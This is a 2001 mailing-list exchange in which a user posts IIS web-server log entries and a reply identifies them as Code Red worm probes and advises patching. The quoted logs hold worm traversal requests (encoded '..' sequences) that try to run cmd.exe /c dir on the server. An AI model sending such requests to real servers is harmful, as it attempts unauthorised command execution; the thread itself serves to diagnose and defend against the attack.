[ale] *OT* But, I need some help.
Scott Harris
grynux at earthlink.net
Sun Oct 21 16:45:20 EDT 2001
those are hits from the code red worm. If you have your server patched for
it, then they are hits from code blue. Go to M$ for the patches.
----- Original Message -----
From: "Jeb" <jeb_barger at yahoo.com>
To: ale at ale.org
To: "ale ale ale" <ale at ale.org>
Sent: Sunday, October 21, 2001 5:30 PM
Subject: [ale] *OT* But, I need some help.
>
>
> After going through my logs on my winboze iis server, I have script
kiddies
> (i think), hitting my boxen.
> However, I don't know what it is. Could you lend me some of your advice?
>
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /msadc/..%5c../..%5c../..%5c/..Ã../..Ã../..Ã../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..Ã../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
>
> Thanks!
>
>
> _________________________________________________________
> Do You Yahoo!?
> Get your free @yahoo.com address at http://mail.yahoo.com
>
>
> ---
> This message has been sent through the ALE general discussion list.
> See http://www.ale.org/mailing-lists.shtml for more info. Problems should
be
> sent to listmaster at ale dot org.
>
---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be
sent to listmaster at ale dot org.
More information about the Ale
mailing list